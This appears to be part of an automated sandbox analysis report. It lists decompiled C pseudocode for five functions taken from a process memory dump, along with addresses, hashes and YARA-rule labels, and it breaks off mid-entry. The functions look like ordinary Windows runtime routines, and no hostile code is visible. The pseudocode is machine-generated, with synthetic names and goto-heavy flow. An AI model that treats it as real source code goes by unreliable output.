                                                                          C-Code - Quality: 97%
                                                                          			E011A2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x124ff00);
				E011CD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1151664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E011BE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1151668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E011F51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x115166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E011A2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01186600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E011A2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0118EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E011A2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E011A2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E011A2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E011CD0D1(_t62);
				goto L28;
			}





















                                                                          0x011a2990
                                                                          0x011a2992
                                                                          0x011a2997
                                                                          0x011a29a3
                                                                          0x011a29a6
                                                                          0x011a29ab
                                                                          0x011a29ad
                                                                          0x011a29b2
                                                                          0x011e5c80
                                                                          0x011a29b8
                                                                          0x011a29b8
                                                                          0x011a29bb
                                                                          0x011a29c0
                                                                          0x011a29c5
                                                                          0x011a29c6
                                                                          0x011a29c6
                                                                          0x011a29cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a29cd
                                                                          0x011a29d0
                                                                          0x011a29d9
                                                                          0x011a29db
                                                                          0x011a29dd
                                                                          0x011a2a7f
                                                                          0x011a2a84
                                                                          0x011a2a87
                                                                          0x011a2a89
                                                                          0x011e5ca1
                                                                          0x011e5ca3
                                                                          0x00000000
                                                                          0x011a2a8f
                                                                          0x011a2a8f
                                                                          0x00000000
                                                                          0x011a2a8f
                                                                          0x00000000
                                                                          0x011a29e3
                                                                          0x011a29e3
                                                                          0x011a29e3
                                                                          0x00000000
                                                                          0x011a29e3
                                                                          0x011a29dd
                                                                          0x00000000
                                                                          0x011a29db
                                                                          0x011a29e6
                                                                          0x011a29e9
                                                                          0x011a29eb
                                                                          0x011a29ed
                                                                          0x011a29f3
                                                                          0x011a29f5
                                                                          0x011a29f8
                                                                          0x011a29fa
                                                                          0x011a2a97
                                                                          0x011a2a9a
                                                                          0x011a2a9d
                                                                          0x011a2add
                                                                          0x00000000
                                                                          0x011a2a9f
                                                                          0x011a2aa2
                                                                          0x011a2aa5
                                                                          0x011a2aa8
                                                                          0x011a2aab
                                                                          0x011e5cab
                                                                          0x011e5caf
                                                                          0x011e5cc5
                                                                          0x011e5cda
                                                                          0x011e5cdc
                                                                          0x011e5cdf
                                                                          0x011e5ce5
                                                                          0x00000000
                                                                          0x011e5ceb
                                                                          0x011e5ced
                                                                          0x011e5cee
                                                                          0x00000000
                                                                          0x011e5cee
                                                                          0x011e5cb1
                                                                          0x011e5cb4
                                                                          0x011e5cb9
                                                                          0x011e5cbb
                                                                          0x00000000
                                                                          0x011e5cbd
                                                                          0x011e5cbd
                                                                          0x00000000
                                                                          0x011e5cbd
                                                                          0x011e5cbb
                                                                          0x011a2ab1
                                                                          0x011a2ab1
                                                                          0x011a2ac4
                                                                          0x011a2ac6
                                                                          0x011a2ac6
                                                                          0x00000000
                                                                          0x011a2ac6
                                                                          0x011a2aab
                                                                          0x00000000
                                                                          0x011a2a00
                                                                          0x011a2a09
                                                                          0x011a2a0e
                                                                          0x011a2a21
                                                                          0x011a2a24
                                                                          0x011a2a35
                                                                          0x011a2a3a
                                                                          0x011a2a3d
                                                                          0x011a2a42
                                                                          0x011a2a59
                                                                          0x011a2a59
                                                                          0x011a2a5c
                                                                          0x011a2a5f
                                                                          0x011a2a5f
                                                                          0x011a29fa
                                                                          0x011a29f3
                                                                          0x011a2a64
                                                                          0x011a2a64
                                                                          0x011a2a6b
                                                                          0x011a2a6b
                                                                          0x011a2a6d
                                                                          0x011a2a72
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e98af3162f6175125567ef21556f938aa4d3c1487f02e0e0045591eac6010309
                                                                          • Instruction ID: 467b347e8cce342d6b1033a240b11e3afd6f30d450ee52bc339ff8bf3198ffd9
                                                                          • Opcode Fuzzy Hash: e98af3162f6175125567ef21556f938aa4d3c1487f02e0e0045591eac6010309
                                                                          • Instruction Fuzzy Hash: D851897990021AEFDF2DCF98C890AEEBFB6BF48314F518115E900AB610D3319952CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A4D3B, Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E011A4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x126d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E011BFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1267bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E011BB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01194620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0117CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E011BB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E011BF380(_t67 + 0xc, 0x1155138, 0x10) == 0) {
								 *0x12660d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E011A4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E011A4E70(0x12686b0, 0x11a5690, 0, 0) != 0) {
					_t46 = E0117CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                          0x011a4d3b
                                                                          0x011a4d4d
                                                                          0x011a4d53
                                                                          0x011a4d58
                                                                          0x011a4d65
                                                                          0x011a4d6c
                                                                          0x011a4d71
                                                                          0x011a4d77
                                                                          0x011a4d7f
                                                                          0x011a4d8c
                                                                          0x011a4d8e
                                                                          0x011a4dad
                                                                          0x011a4db0
                                                                          0x011a4db7
                                                                          0x011a4db8
                                                                          0x011a4db9
                                                                          0x011a4dba
                                                                          0x011a4dbb
                                                                          0x011a4dc1
                                                                          0x011a4dc8
                                                                          0x011a4dcc
                                                                          0x011a4dd5
                                                                          0x011a4dde
                                                                          0x011a4ddf
                                                                          0x011a4de0
                                                                          0x011a4de1
                                                                          0x011a4de6
                                                                          0x011a4de7
                                                                          0x011a4de9
                                                                          0x011a4df3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6c7c
                                                                          0x011e6c8a
                                                                          0x011e6c8a
                                                                          0x011e6c9d
                                                                          0x011e6ca7
                                                                          0x011e6cac
                                                                          0x011e6cb2
                                                                          0x011e6cb9
                                                                          0x00000000
                                                                          0x011e6cbf
                                                                          0x011e6cbf
                                                                          0x00000000
                                                                          0x011e6cbf
                                                                          0x011e6cb9
                                                                          0x011a4dfb
                                                                          0x011e6ccf
                                                                          0x011e6cd3
                                                                          0x011a4e32
                                                                          0x011a4e39
                                                                          0x011e6ce0
                                                                          0x011e6cf2
                                                                          0x011e6cf2
                                                                          0x011e6ce0
                                                                          0x011a4e3f
                                                                          0x011a4e41
                                                                          0x011a4e51
                                                                          0x011a4e51
                                                                          0x011a4e03
                                                                          0x011a4e03
                                                                          0x011a4e09
                                                                          0x011a4e0f
                                                                          0x011a4e57
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a4e1b
                                                                          0x011a4e30
                                                                          0x011a4e5b
                                                                          0x011a4e5b
                                                                          0x00000000
                                                                          0x011a4e30
                                                                          0x011a4e11
                                                                          0x011a4e11
                                                                          0x011a4e16
                                                                          0x00000000
                                                                          0x011a4e16
                                                                          0x011a4e01
                                                                          0x00000000
                                                                          0x011a4e01
                                                                          0x011a4da5
                                                                          0x011e6c6b
                                                                          0x00000000
                                                                          0x011a4dab
                                                                          0x011a4dab
                                                                          0x00000000
                                                                          0x011a4dab

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5597851885ac48ee737f15179ebcdc55677511b3aece60db95e96003a18c7406
                                                                          • Instruction ID: 195d68b5f2317efd238fbcfdc7c291ba359716c62fd91f1fc883586a505adc7d
                                                                          • Opcode Fuzzy Hash: 5597851885ac48ee737f15179ebcdc55677511b3aece60db95e96003a18c7406
                                                                          • Instruction Fuzzy Hash: 9D414975A403189FEB3DCF18CC80FAABBB9EB14714F444099EA0597681D7B4ED40CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01188A0A, Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E01188A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x126d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E011BB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0118E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1151180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E011A1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E011B3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01188999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                          0x01188a0a
                                                                          0x01188a1c
                                                                          0x01188a23
                                                                          0x01188a2e
                                                                          0x01188a30
                                                                          0x01188a36
                                                                          0x01188a3c
                                                                          0x01188a3e
                                                                          0x01188a4a
                                                                          0x01188a52
                                                                          0x01188a9c
                                                                          0x01188aae
                                                                          0x01188a58
                                                                          0x01188a5e
                                                                          0x01188a6a
                                                                          0x01188a6f
                                                                          0x01188a75
                                                                          0x01188a7d
                                                                          0x01188a85
                                                                          0x01188a86
                                                                          0x01188a89
                                                                          0x01188a93
                                                                          0x01188a99
                                                                          0x01188a9b
                                                                          0x00000000
                                                                          0x01188aaf
                                                                          0x01188abe
                                                                          0x01188ac3
                                                                          0x01188acb
                                                                          0x01188ad7
                                                                          0x01188ae0
                                                                          0x01188af1
                                                                          0x00000000
                                                                          0x01188af1
                                                                          0x01188acd
                                                                          0x01188ad5
                                                                          0x01188afb
                                                                          0x01188afd
                                                                          0x01188aff
                                                                          0x01188b07
                                                                          0x01188b22
                                                                          0x01188b24
                                                                          0x01188b2a
                                                                          0x01188b2e
                                                                          0x01188b3f
                                                                          0x01188b78
                                                                          0x01188b41
                                                                          0x01188b52
                                                                          0x01188b54
                                                                          0x01188b5c
                                                                          0x01188b74
                                                                          0x01188b74
                                                                          0x01188b5c
                                                                          0x01188b3f
                                                                          0x01188b5e
                                                                          0x01188b61
                                                                          0x01188b64
                                                                          0x01188b64
                                                                          0x01188b6c
                                                                          0x01188b6c
                                                                          0x01188b11
                                                                          0x011d9cd5
                                                                          0x011d9cd5
                                                                          0x01188b17
                                                                          0x01188b1a
                                                                          0x01188b1a
                                                                          0x00000000
                                                                          0x01188ad5
                                                                          0x01188a89

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e6932bbccf82a436ff5cecf32c0aec6953db666a237f96bd78f800374d353c58
                                                                          • Instruction ID: a4a8069a891cec6905438548c656f5be881fb30fb607071b3065ac2c61bf85dc
                                                                          • Opcode Fuzzy Hash: e6932bbccf82a436ff5cecf32c0aec6953db666a237f96bd78f800374d353c58
                                                                          • Instruction Fuzzy Hash: 104175B4A4022D9BDB2CEF59CC88BA9B7F4FB94300F5185E9D91997252E7709E80CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F69A6, Relevance: .1, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E011F69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x126d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01186C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E011F6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E011B9980() >= 0) {
							E01192280(_t56, 0x1268778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1268774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1268774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0117B6F0(0x115c338, 0x115c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E011B9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E011B95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0118FFB0(_t68, _t77, 0x1268778);
				}
				_pop(_t78);
				return E011BB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                          0x011f69b5
                                                                          0x011f69be
                                                                          0x011f69c3
                                                                          0x011f69c9
                                                                          0x011f69cc
                                                                          0x011f69d1
                                                                          0x011f69d3
                                                                          0x011f69de
                                                                          0x011f69e1
                                                                          0x011f69ea
                                                                          0x011f69f6
                                                                          0x011f69fe
                                                                          0x011f6a13
                                                                          0x011f6a14
                                                                          0x011f6a15
                                                                          0x011f6a16
                                                                          0x011f6a1e
                                                                          0x011f6a26
                                                                          0x011f6a31
                                                                          0x011f6a36
                                                                          0x011f6a37
                                                                          0x011f6a40
                                                                          0x011f6a49
                                                                          0x011f6a4a
                                                                          0x011f6a53
                                                                          0x011f6a59
                                                                          0x011f6a5d
                                                                          0x011f6a5e
                                                                          0x011f6a64
                                                                          0x011f6a67
                                                                          0x011f6a6a
                                                                          0x011f6a6d
                                                                          0x011f6a70
                                                                          0x011f6a77
                                                                          0x011f6a7d
                                                                          0x011f6a86
                                                                          0x011f6a89
                                                                          0x011f6a9c
                                                                          0x011f6a9f
                                                                          0x011f6aa2
                                                                          0x011f6aa5
                                                                          0x011f6aaf
                                                                          0x011f6ab1
                                                                          0x011f6ab8
                                                                          0x011f6ab9
                                                                          0x011f6abb
                                                                          0x011f6abe
                                                                          0x011f6ac5
                                                                          0x011f6ac5
                                                                          0x011f6aaf
                                                                          0x011f6a40
                                                                          0x011f6a26
                                                                          0x011f69fe
                                                                          0x011f6ace
                                                                          0x011f6ad0
                                                                          0x011f6ad3
                                                                          0x011f6ad8
                                                                          0x011f6adf
                                                                          0x011f6adf
                                                                          0x011f6ae8
                                                                          0x011f6aef
                                                                          0x011f6aef
                                                                          0x011f6af9
                                                                          0x011f6b06

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2c407cb56908fcb161bf5b06218b437efee49f3adf4901a758755db53af40b5c
                                                                          • Instruction ID: 3157b3f614bbbd334ca4533c44cfb479bb4dd5e55d397995c6edc8f5525e9dc3
                                                                          • Opcode Fuzzy Hash: 2c407cb56908fcb161bf5b06218b437efee49f3adf4901a758755db53af40b5c
                                                                          • Instruction Fuzzy Hash: DF416FB1D007099FDB29DFA9D940BEEBBF8EF48714F14812EEA14A7250EB749905CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B3D43, Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011B3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01187B60(0, _t61, 0x11511c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01187B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01194620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                          0x011b3d4c
                                                                          0x011b3d50
                                                                          0x011b3d55
                                                                          0x011b3d5e
                                                                          0x011ee79a
                                                                          0x00000000
                                                                          0x011ee79a
                                                                          0x011b3d68
                                                                          0x011ee789
                                                                          0x011b3d9d
                                                                          0x011b3da3
                                                                          0x011b3daf
                                                                          0x011b3db5
                                                                          0x011b3dbc
                                                                          0x011b3dc4
                                                                          0x011b3dc9
                                                                          0x011b3dce
                                                                          0x011ee7ae
                                                                          0x011ee7ae
                                                                          0x011b3dde
                                                                          0x011b3de2
                                                                          0x011b3de7
                                                                          0x011b3e0d
                                                                          0x011b3e13
                                                                          0x011b3e16
                                                                          0x011b3e1e
                                                                          0x011b3e25
                                                                          0x011b3e28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b3e2a
                                                                          0x011b3e2f
                                                                          0x011b3e37
                                                                          0x011b3e37
                                                                          0x00000000
                                                                          0x011b3e37
                                                                          0x011b3e31
                                                                          0x00000000
                                                                          0x011b3e31
                                                                          0x011b3e20
                                                                          0x011b3e20
                                                                          0x011b3e35
                                                                          0x00000000
                                                                          0x011b3de9
                                                                          0x011b3de9
                                                                          0x011b3de9
                                                                          0x011b3dee
                                                                          0x011b3dfd
                                                                          0x011b3dff
                                                                          0x011b3e02
                                                                          0x011b3e05
                                                                          0x011b3e05
                                                                          0x00000000
                                                                          0x011b3df0
                                                                          0x011b3de7
                                                                          0x011ee78f
                                                                          0x011ee794
                                                                          0x011b3d79
                                                                          0x011b3d84
                                                                          0x011b3d89
                                                                          0x011b3d8e
                                                                          0x00000000
                                                                          0x011ee7a4
                                                                          0x011b3d96
                                                                          0x011b3d9a
                                                                          0x00000000
                                                                          0x011b3d9a
                                                                          0x00000000
                                                                          0x011ee794
                                                                          0x011b3d6e
                                                                          0x011b3d73
                                                                          0x00000000
                                                                          0x011ee7b5
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d1127c20c3c0af841b7078fa624942888bccce7c3d3e08111eb0e954ea7c00e
                                                                          • Instruction ID: 04be44182fe220dea66fed49f41dd9d34499034f6dfe287c2e5101fcab7bc61d
